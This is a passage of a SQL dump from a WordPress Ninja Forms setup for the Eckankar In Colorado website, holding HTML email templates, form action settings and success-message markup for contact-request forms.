#333333\"><strong>TELEPHONE:</strong> {field:phone_157}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_158}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166754232}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_162}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Northwest Mountain Area Initiators and ESAâs</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for theÂ <em>Northwest Mountain Area ECK Leadership organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_154}Â {field:lastname_155}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_154}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_155}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_156}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_157}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_158}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166754232}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_162}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(1995,76,'attach_csv','0','attach_csv','0'),(1996,76,'email_format','html','email_format','html'),(1997,76,'reply_to','','reply_to',''),(1998,76,'cc','','cc',''),(1999,76,'bcc','','bcc',''),(2000,76,'redirect_url','','redirect_url',''),(2001,76,'success_msg','','success_msg',''),(2002,76,'label','Admin Email','label','Admin Email'),(2003,76,'objectType','Action','objectType','Action'),(2004,76,'objectDomain','actions','objectDomain','actions'),(2005,76,'editActive','','editActive',''),(2006,76,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2007,76,'payment_gateways','','payment_gateways',''),(2008,76,'payment_total','0','payment_total','0'),(2009,76,'tag','','tag',''),(2010,76,'email_message_plain','','email_message_plain',''),(2011,76,'drawerDisabled','','drawerDisabled',''),(2012,76,'parent_id','19','parent_id','19'),(2013,77,'title','','title',''),(2014,77,'key','','key',''),(2015,77,'type','save','type','save'),(2016,77,'active','1','active','1'),(2017,77,'created_at','2018-01-03 11:44:49','created_at','2018-01-03 11:44:49'),(2018,77,'label','Save Form','label','Save Form'),(2019,77,'objectType','Action','objectType','Action'),(2020,77,'objectDomain','actions','objectDomain','actions'),(2021,77,'editActive','','editActive',''),(2022,77,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2023,77,'payment_gateways','','payment_gateways',''),(2024,77,'payment_total','0','payment_total','0'),(2025,77,'tag','','tag',''),(2026,77,'to','{wp:admin_email}','to','{wp:admin_email}'),(2027,77,'reply_to','','reply_to',''),(2028,77,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(2029,77,'email_message','{fields_table}','email_message','{fields_table}'),(2030,77,'email_message_plain','','email_message_plain',''),(2031,77,'from_name','','from_name',''),(2032,77,'from_address','','from_address',''),(2033,77,'email_format','html','email_format','html'),(2034,77,'cc','','cc',''),(2035,77,'bcc','','bcc',''),(2036,77,'redirect_url','','redirect_url',''),(2037,77,'parent_id','20','parent_id','20'),(2038,78,'title','','title',''),(2039,78,'key','','key',''),(2040,78,'type','email','type','email'),(2041,78,'active','1','active','1'),(2042,78,'created_at','2018-01-03 11:44:49','created_at','2018-01-03 11:44:49'),(2043,78,'date_updated','2016-01-15','date_updated','2016-01-15'),(2044,78,'attach_csv','0','attach_csv','0'),(2045,78,'email_format','html','email_format','html'),(2046,78,'reply_to','','reply_to',''),(2047,78,'cc','','cc',''),(2048,78,'bcc','','bcc',''),(2049,78,'redirect_url','','redirect_url',''),(2050,78,'success_msg','','success_msg',''),(2051,78,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(2052,78,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(2053,78,'to','{field:email_168}','to','{field:email_168}'),(2054,78,'email_subject','Loveland Initiators and ESAâs','email_subject','Loveland Initiators and ESAâs'),(2055,78,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_166},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Parker ECK Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_166}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_167}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_168}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_169}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_170}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166807240}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_174}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_166},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Parker ECK Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_166}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_167}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_168}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_169}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_170}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166807240}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_174}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(2056,78,'label','Send copy to user','label','Send copy to user'),(2057,78,'objectType','Action','objectType','Action'),(2058,78,'objectDomain','actions','objectDomain','actions'),(2059,78,'editActive','','editActive',''),(2060,78,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2061,78,'payment_gateways','','payment_gateways',''),(2062,78,'payment_total','0','payment_total','0'),(2063,78,'tag','','tag',''),(2064,78,'email_message_plain','','email_message_plain',''),(2065,78,'parent_id','20','parent_id','20'),(2066,79,'title','','title',''),(2067,79,'key','','key',''),(2068,79,'type','successmessage','type','successmessage'),(2069,79,'active','1','active','1'),(2070,79,'created_at','2018-01-03 11:44:49','created_at','2018-01-03 11:44:49'),(2071,79,'date_updated','2016-01-15','date_updated','2016-01-15'),(2072,79,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>'),(2073,79,'from_name','','from_name',''),(2074,79,'from_address','','from_address',''),(2075,79,'to','{wp:admin_email}','to','{wp:admin_email}'),(2076,79,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(2077,79,'email_message','{fields_table}','email_message','{fields_table}'),(2078,79,'attach_csv','0','attach_csv','0'),(2079,79,'email_format','html','email_format','html'),(2080,79,'reply_to','','reply_to',''),(2081,79,'cc','','cc',''),(2082,79,'bcc','','bcc',''),(2083,79,'redirect_url','','redirect_url',''),(2084,79,'label','Success Message','label','Success Message'),(2085,79,'objectType','Action','objectType','Action'),(2086,79,'objectDomain','actions','objectDomain','actions'),(2087,79,'editActive','','editActive',''),(2088,79,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2089,79,'payment_gateways','','payment_gateways',''),(2090,79,'payment_total','0','payment_total','0'),(2091,79,'tag','','tag',''),(2092,79,'email_message_plain','','email_message_plain',''),(2093,79,'parent_id','20','parent_id','20'),(2094,80,'title','','title',''),(2095,80,'key','','key',''),(2096,80,'type','email','type','email'),(2097,80,'active','1','active','1'),(2098,80,'created_at','2018-01-03 11:44:49','created_at','2018-01-03 11:44:49'),(2099,80,'date_updated','2016-01-19','date_updated','2016-01-19'),(2100,80,'from_name','Parker Initiators and ESAâs','from_name','Parker Initiators and ESAâs'),(2101,80,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(2102,80,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(2103,80,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(2104,80,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Parker Initiators and ESAâs</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Parker ECK Leadership organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_166}Â {field:lastname_167} </span>has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_166}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_167}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_168}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_169}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_170}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166807240}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_174}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br 